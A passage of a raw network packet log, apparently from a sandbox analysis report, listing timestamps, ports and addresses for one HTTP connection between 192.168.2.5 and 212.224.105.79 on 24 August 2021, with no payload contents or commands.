Aug 24, 2021 08:49:12.584506035 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.584526062 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.584542990 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.584561110 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.584579945 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.584603071 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.584611893 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.584635973 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.584650040 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.584657907 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.584681034 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.584717989 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.584732056 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.584755898 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.584777117 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.584800005 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.584800959 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.584825039 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.584830046 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.584846973 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.584868908 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.584871054 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.584891081 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.584912062 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.584914923 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.584933996 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.584954023 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.584954977 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.584980965 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585004091 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585022926 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.585026979 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585062981 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.585064888 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585088968 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585107088 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.585110903 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585134029 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585155964 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585163116 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.585187912 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585211992 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585216045 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.585233927 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585258007 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585279942 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585280895 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.585303068 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585310936 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.585326910 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585341930 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.585350037 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585374117 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585393906 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.585397005 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585418940 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585441113 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585463047 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585468054 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.585486889 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585500002 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.585509062 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585532904 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585536003 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.585556984 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585566044 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.585582018 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585597038 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.585602999 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585624933 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585647106 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.585647106 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585669994 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585691929 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585692883 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.585714102 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585736990 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.585738897 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585762978 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585783958 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585786104 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.585807085 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585829973 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585851908 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585853100 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.585875988 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585881948 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.585900068 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585926056 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585927010 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.585949898 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585969925 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.585971117 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.585994005 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.586018085 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.586039066 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.586039066 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.586064100 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.586081028 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.586086035 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.586111069 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.586112022 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.586134911 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.586158991 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.591475964 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.591511965 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.591532946 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.591555119 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.591577053 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.591598034 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.591598034 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.591617107 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.591640949 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.591660023 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.596839905 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.596877098 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.596900940 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.596925020 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.596947908 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.596949100 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.596970081 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.596993923 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.596993923 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.597017050 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.597306013 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.597333908 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.597356081 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.597379923 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.597393036 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.597404003 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.597426891 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.597439051 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.597450972 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.597459078 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.597475052 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.597489119 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.597498894 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.597543955 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.606750011 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.606790066 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.606805086 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.606820107 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.606844902 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.606867075 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.606888056 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.606893063 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.606906891 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.606924057 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.606930971 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.606947899 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.606959105 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.606982946 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.606997967 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.607027054 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.607057095 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.609088898 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.609127998 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.609148026 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.609167099 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.609179974 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.609181881 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.609199047 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.609215021 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.609230042 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.609246016 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.609261036 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.609276056 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.609292030 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.609313965 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.609327078 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.609338999 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.609354973 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.609389067 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.609389067 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.609437943 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.609442949 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.609443903 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.609446049 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.609447956 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.609450102 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.609461069 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.609477997 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.609488010 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.609493017 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.609513998 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.609534979 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.609555960 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.609556913 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.609561920 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.609580994 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.609580994 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.609601021 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.609656096 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.609692097 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.609713078 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.609730959 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.609749079 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.609759092 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.609770060 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.609781981 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.609797955 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.609816074 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:12.609844923 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:12.609878063 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.341062069 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.341114044 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.363394022 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.363431931 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.387263060 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.396722078 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.396758080 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.418880939 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.442183018 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.450057030 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.450113058 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.472286940 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.496781111 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.519666910 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.519705057 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.543200970 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.566477060 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.575030088 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.575067043 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.597309113 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.620245934 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.661973000 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.662008047 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.684216022 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.743571997 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.743640900 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.743666887 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.743722916 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.743748903 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.743777037 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.743797064 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.743824005 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.743861914 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.743865013 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.743890047 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.743896008 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.743901014 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.743917942 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.743923903 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.743947029 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.743978977 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.744008064 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.744034052 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.744045019 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.744050980 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.744061947 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.744091034 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.744116068 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.744119883 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.744126081 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.744143009 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.744168997 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.744199038 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.744226933 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.744231939 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.744237900 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.744252920 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.744281054 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.744312048 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.744334936 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.744338036 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.744340897 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.744366884 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.744395018 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.744425058 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.744452953 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.744478941 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.744482040 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.744488955 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.744565964 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.767052889 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.767097950 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.767158031 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.767188072 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.767215967 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.767242908 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.767273903 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.767302990 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.767306089 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.767329931 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.767335892 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.767339945 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.767360926 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.767389059 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.767389059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.767419100 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.767445087 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.767472982 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.767504930 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.767519951 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.767524958 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.767534018 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.767560959 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.767591000 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.767611980 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.767617941 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.767617941 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.767647028 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.767673016 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.767698050 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.767724037 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.767726898 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.767729044 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.767754078 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.767780066 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.767807007 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.767827034 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.767832994 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.767833948 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.767862082 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.767889977 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.767914057 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.767944098 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.767956972 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.767961979 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.767971992 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.767997026 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.768022060 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.768047094 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.768062115 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.768066883 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.768071890 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.768098116 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.768125057 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.768152952 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.768155098 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.768160105 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.768181086 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.768205881 CEST	80	49712	212.224.105.79	192.168.2.5
